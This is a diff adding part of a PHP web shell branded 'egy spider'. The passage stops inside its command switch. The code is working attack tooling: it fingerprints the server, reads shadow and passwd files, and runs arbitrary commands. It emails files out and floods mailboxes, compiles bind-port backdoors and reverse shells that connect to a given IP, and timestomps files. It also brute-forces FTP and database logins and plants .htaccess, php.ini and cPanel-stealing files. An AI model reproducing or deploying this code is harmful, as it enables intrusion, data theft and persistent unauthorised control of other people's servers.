+ $ust_d = trim($ust_d);
+}else {
+ $ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
+}
+
+
+if(!isset($_COOKIE[$lang[$language.'_text142']])) {
+
+
+ $select_downloaders='<select size="1" name=with>';
+ if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
+ if($unix && !$safe_mode){
+ foreach ($downloaders as $item) {
+ if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
+ }
+ }
+ $select_downloaders .= '</select>';
+ if(substr($downloader,0,1)==",") {$downloader[0]="";}
+
+ $downloader=trim($downloader);
+
+
+}
+
+
+
+
+echo $head;
+echo '</head>';
+
+
+echo '<<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#dadada><tr><td bgcolor=#000000 width=120><font face=Comic Sans MS size=1>'.ws(2).'<DIV dir=ltr align=center><p><font style="font-weight: 500" face="Webdings" color="#800000" size="7">!</font></p>'.ws(2).'<DIV dir=ltr align=center><SPAN
+style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
+<SPAN
+style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">egy spider</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>'.
+
+
+'</center></font>'.$fe.'</td>'.'<td bgcolor=#333333><font face=#FFFFFF size=-2>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
+echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
+echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
+echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
+
+
+echo "<br>";
+
+
+echo ws(2)."PHP Version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
+echo "</b>".ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
+echo "</b>".ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "MySQLi: <b>";
+$mysqli_on = @function_exists('mysqli_connect');
+if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "MSQL: <b>";
+$msql_on = @function_exists('msql_connect');
+if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b>".ws(2);
+echo "SQLite: <b>";
+$sqlite_on = @function_exists('sqlite_open');
+if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
+echo "</b><br>".ws(2);
+
+
+echo "Safe_Mode: <b>";
+echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
+echo "</b>".ws(2);
+echo "Open_Basedir: <b>";
+if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
+else {echo "<font color=green>NONE</font></b>";}
+echo ws(2)."Safe_Exec_Dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Safe_Gid: <b>";
+if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Safe_Include_Dir: <b>";
+if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+echo ws(2)."Sql.safe_mode: <b>";
+if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
+else {echo "<font color=red>ini_get disable!</font></b>";}
+
+
+echo "<br>".ws(2);
+echo "Disable Functions : <b>";$df='ini_get disable!';
+if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+
+
+if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
+elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."Free Space : <b>".view_size($free)."</b> Total Space: <b>".view_size($all)."</b>";
+
+
+
+
+if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
+
+
+if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
+
+
+if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
+
+
+
+
+echo "<br>".ws(2)."</b>";
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?' title=\"".$lang[$language.'_text160']."\"><b>Home</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?egy' title=\"".$lang[$language.'_text159']."\"><b>About EgY SpIdEr</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?news' title=\"".$lang[$language.'_text152']."\"><b>News</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?logout=1' title=\"".$lang[$language.'_text153']."\"><b>Logout</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=feedback' title=\"".$lang[$language.'_text180']."\"><b>Feedback & Contact Me </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=qindx' title=\"".$lang[$language.'_text154']."\"><b>Quick index </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=massbrowsersploit' title=\"".$lang[$language.'_text155']."\"><b>Mass Code Injection</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=showsrc' title=\"".$lang[$language.'_text156']."\"><b>File source </b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&dlink=zone' title=\"".$lang[$language.'_text157']."\"><b>Zone-h</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?tools&act=encoder' title=\"".$lang[$language.'_text158']."\"><b>Hash Tools</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>PhpInfo</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>Php.Ini</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>Cpu</b></a> ".$rb;
+if(!$unix) {
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>SystemInfo</b></a> ".$rb;
+}else{
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>Syslog</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>Resolv</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?8' title=\"View hosts\"><b>Hosts</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?9' title=\"View shadow\"><b>Shadow</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?10' title=\"".$lang[$language.'_text95']."\"><b>Passwd</b></a> ".$rb;
+}
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?11' title=\"".$lang[$language.'_text48']."\"><b>Tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?12' title=\"".$lang[$language.'_text49']."\"><b>Delete</b></a> ".$rb;
+
+
+if($unix && !$safe_mode)
+{
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?13' title=\"View procinfo\"><b>Procinfo</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?14' title=\"View proc version\"><b>Version</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?15' title=\"View mem free\"><b>Free</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?16' title=\"View dmesg\"><b>Dmesg</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?17' title=\"View vmstat\"><b>Vmstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?18' title=\"View lspci\"><b>lspci</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?19' title=\"View lsdev\"><b>lsdev</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?20' title=\"View interrupts\"><b>Interrupts</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?21' title=\"View realise1\"><b>Realise1</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?22' title=\"View realise2\"><b>Realise2</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?23' title=\"View lsattr -va\"><b>lsattr</b></a> ".$rb;
+
+
+ echo "<br>".ws(2)."</b>";
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?24' title=\"View w\"><b>W</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?25' title=\"View who\"><b>Who</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?26' title=\"View uptime\"><b>Uptime</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?27' title=\"View last -n 10\"><b>Last</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?28' title=\"View ps -aux\"><b>Ps Aux</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?29' title=\"View service\"><b>Service</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?30' title=\"View ifconfig\"><b>Ifconfig</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?31' title=\"View netstat -a\"><b>Netstat</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?32' title=\"View fstab\"><b>Fstab</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?33' title=\"View fdisk -l\"><b>Fdisk</b></a> ".$rb;
+ echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?34' title=\"View df -h\"><b>df -h</b></a> ".$rb;
+}
+
+
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+
+
+if($unix){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid'))
+ {
+ $euserinfo = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if($file=moreread($_POST['loc_file'])){ $filedump = $file; }
+ else if ($file=readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ if(!empty($_POST['cmd']))
+ {
+ $filename = @basename($_POST['loc_file']);
+ $content_encoding=$mime_type='';
+ compress($filename,$filedump,$_POST['compress']);
+ $attach = array(
+ "name"=>$filename,
+ "type"=>$mime_type,
+ "content"=>$filedump
+ );
+ if(empty($_POST['subj'])) { $_POST['subj'] = 'file from egy spider shell'; }
+ if(empty($_POST['from'])) { $_POST['from'] = 'egy_spider@hotmail.com'; }
+ $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size']))
+ {
+ for($h=1;$h<=$_POST['mail_flood'];$h++){
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'].str_repeat(" ", 1024*$_POST['mail_size']),"From: ".$_POST['from']."\r\n");
+ }
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+ {
+ case 'own':
+ @chown($_POST['param1'],$_POST['param2']);
+ break;
+ case 'grp':
+ @chgrp($_POST['param1'],$_POST['param2']);
+ break;
+ case 'mod':
+ @chmod($_POST['param1'],intval($_POST['param2'], 8));
+ break;
+ }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+ switch($_POST['what'])
+ {
+ case 'file':
+ if($_POST['action'] == "create")
+ {
+ if(@file_exists($_POST['mk_name']) || !morewrite($_POST['mk_name'],'your text here')) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+ else {
+ $_POST['e_name'] = $_POST['mk_name'];
+ $_POST['cmd']="edit_file";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+ }
+ }
+ else if($_POST['action'] == "delete")
+ {
+ if(@unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+ $_POST['cmd']="";
+ }
+ break;
+ case 'dir':
+ if($_POST['action'] == "create"){
+ if(@mkdir($_POST['mk_name']))
+ {
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+ }
+ else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+ }
+ else if($_POST['action'] == "delete"){
+ if(@rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+ $_POST['cmd']="";
+ }
+ break;
+ }
+ }
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="touch")
+{
+if(!$_POST['file_name_r'])
+ {
+ $datar = $_POST['day']." ".$_POST['month']." ".$_POST['year']." ".$_POST['chasi']." hours ".$_POST['minutes']." minutes ".$_POST['second']." seconds";
+ $datar = @strtotime($datar);
+ @touch($_POST['file_name'],$datar,$datar);}
+else{
+ @touch($_POST['file_name'],@filemtime($_POST['file_name_r']),@filemtime($_POST['file_name_r']));
+}
+$_POST['cmd']="";
+}
+
+
+
+
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(@is_dir($_POST['e_name'])){ err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ elseif($file=moreread($_POST['e_name'])) { $filedump = $file; if(!@is_writable($_POST['e_name'])) { $only_read = 1; }; }
+ elseif($file=readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; }
+ elseif(@file_exists($_POST['e_name'])) {$filedump = 'NONE'; if(!@is_writable($_POST['e_name'])) { $only_read = 1; };}
+ else { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ if(!empty($_POST['cmd']))
+ {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars($filedump);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value='".$_POST['e_name']."'>";
+ echo "<input type=hidden name=dir value='".$dir."'>";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!@is_writable($_POST['e_name'])) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
+ morewrite($_POST['e_name'],$_POST['e_text']);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ @touch($_POST['e_name'],$mtime,$mtime);
+ }
+
+
+
+if (!empty($_POST['proxy_port'])&&($_POST['use']=="Perl"))
+{
+ cf($tempdir.'prxpl',$prx_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'prxpl '.$_POST['proxy_port'].' &');
+ @unlink($tempdir.'prxpl');
+ $_POST['cmd']="ps -aux | grep prxpl";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf($tempdir.'bd.c',$port_bind_bd_c);
+ $blah = ex('gcc -o '.$tempdir.'bd '.$tempdir.'bd.c');
+ @unlink($tempdir.'bd.c');
+ $blah = ex($tempdir.'bd '.$_POST['port'].' '.$_POST['bind_pass'].' &');
+ @unlink($tempdir.'bd');
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf($tempdir.'bdpl',$port_bind_bd_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'bdpl '.$_POST['port'].' &');
+ @unlink($tempdir.'bdpl');
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf($tempdir.'back',$back_connect);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'back '.$_POST['ip'].' '.$_POST['port'].' &');
+ @unlink($tempdir.'back');
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
+{
+ cf($tempdir.'back.c',$back_connect_c);
+ $blah = ex('gcc -o '.$tempdir.'backc '.$tempdir.'back.c');
+ @unlink($tempdir.'back.c');
+ $blah = ex($tempdir.'backc '.$_POST['ip'].' '.$_POST['port'].' &');
+ @unlink($tempdir.'back');
+ $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
+{
+ cf($tempdir.'dp',$datapipe_pl);
+ $p2=which("perl");
+ $blah = ex($p2.' '.$tempdir.'dp '.$_POST['local_port'].' '.$_POST['remote_host'].' '.$_POST['remote_port'].' &');
+ @unlink($tempdir.'dp');
+ $_POST['cmd']="ps -aux | grep dp";
+}
+if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
+{
+ cf($tempdir.'dpc.c',$datapipe_c);
+ $blah = ex('gcc -o '.$tempdir.'dpc '.$tempdir.'dpc.c');
+ @unlink($tempdir.'dpc.c');
+ $blah = ex($tempdir.'dpc '.$_POST['local_port'].' '.$_POST['remote_port'].' '.$_POST['remote_host'].' &');
+ @unlink($tempdir.'dpc');
+ $_POST['cmd']="ps -aux | grep dpc";
+}
+
+
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+
+
+for($upl=0;$upl<=16;$upl++)
+{
+ if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
+ if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
+ else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
+ @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
+ or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
+ }
+}
+if (!empty($_POST['port1']))
+{
+ cf("bds",$port_bind_bd_cs);
+ $blah = ex("chmod 777 bds");
+ $blah = ex("./bds ".$_POST['port1']." &");
+ $_POST['cmd']="echo \"Now script install backdoor connect to port ";
+ }else{
+cf("/tmp/bds",$port_bind_bd_cs);
+ $blah = ex("chmod 777 bds");
+ }
+if (!empty($_POST['php_ini1']))
+{
+ cf("php.ini",$egy_ini);
+ $_POST['cmd']=" now make incloude for file ini.php and add ss and your shell";
+ }
+
+
+ if (!empty($_POST['htacces']))
+{
+ cf(".htaccess",$htacces);
+ $_POST['cmd']="now .htaccess has been add";
+ }
+ if (!empty($_POST['egy_res']))
+{
+ cf(".ini.php",$egy_res);
+ $_POST['cmd']="now .htaccess has been add";
+ }
+ if (!empty($_POST['egy_ini']))
+{
+ cf("ini.php",$egy_ini);
+
+
+
+ $_POST['cmd']=" http://target.com/ini.php?egy=http://shell.txt? add ss ini.php now make incloude for file ini.php and add egy and your shell";
+ }
+
+
+ if (!empty($_POST['egy_cp']))
+{
+ cf("pass_cpanel.php",$egy_cp);
+ $_POST['cmd']="cpanel add";
+ }
+
+
+ if (!empty($_POST['egy_vb']))
+{
+ cf("vb_hacker.php",$egy_vb);
+ $_POST['cmd']="Added Following Files .htaccess & ini.php & vb_hacker.php & pass_cpanel.php ";
+ }
+
+if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
+
+
+for($upl=0;$upl<=16;$upl++)
+{
+
+
+}
+
+
+if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
+{
+ switch($_POST['with'])
+ {
+ case 'fopen':
+ $datafile = @implode("", @file($_POST['rem_file']));
+ if($datafile)
+ {
+ if(!morewrite($_POST['loc_file'],$datafile)){ err(0);};
+ }
+
+
+ $_POST['cmd'] = '';
+ break;
+ case 'wget':
+ $_POST['cmd'] = which('wget')." \"".$_POST['rem_file']."\" -O \"".$_POST['loc_file']."\"";
+ break;
+ case 'fetch':
+ $_POST['cmd'] = which('fetch')." -p \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
+ break;
+ case 'lynx':
+ $_POST['cmd'] = which('lynx')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'links':
+ $_POST['cmd'] = which('links')." -source \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'GET':
+ $_POST['cmd'] = which('GET')." \"".$_POST['rem_file']."\" > \"".$_POST['loc_file']."\"";
+ break;
+ case 'curl':
+ $_POST['cmd'] = which('curl')." \"".$_POST['rem_file']."\" -o \"".$_POST['loc_file']."\"";
+ break;
+ }
+}
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_file_up") || ($_POST['cmd']=="ftp_file_down")))
+ {
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ if(!$connection) { err(3); }
+ else
+ {
+ if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
+ else
+ {
+ if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);}
+ if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);}
+ }
+ }
+ @ftp_close($connection);
+ $_POST['cmd'] = "";
+ }
+
+
+if(!empty($_POST['cmd']) && (($_POST['cmd']=="ftp_brute") || ($_POST['cmd']=="db_brute")))
+ {
+ if($_POST['cmd']=="ftp_brute"){
+ list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
+ if(empty($ftp_port)) { $ftp_port = 21; }
+ $connection = @ftp_connect ($ftp_server,$ftp_port,10);
+ }else if($_POST['cmd']=="db_brute"){
+ $connection = 1;
+ }
+ if(!$connection) { err(3); $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='passwd') && (!$users=get_users('/etc/passwd'))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ else if(($_POST['brute_method']=='dic') && (!$users=get_users($_POST['dictionary']))){ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>Can\'t get password list</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
+ if($_POST['cmd']=="ftp_brute"){@ftp_close($connection);}
+ }
+
+
+echo $table_up3;
+if (empty($_POST['cmd']) && !$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
+else if(empty($_POST['cmd']) && $safe_mode){ $_POST['cmd']="safe_dir"; }
+echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
+{
+ switch($_POST['cmd'])
+ {
+ case 'safe_dir':
+
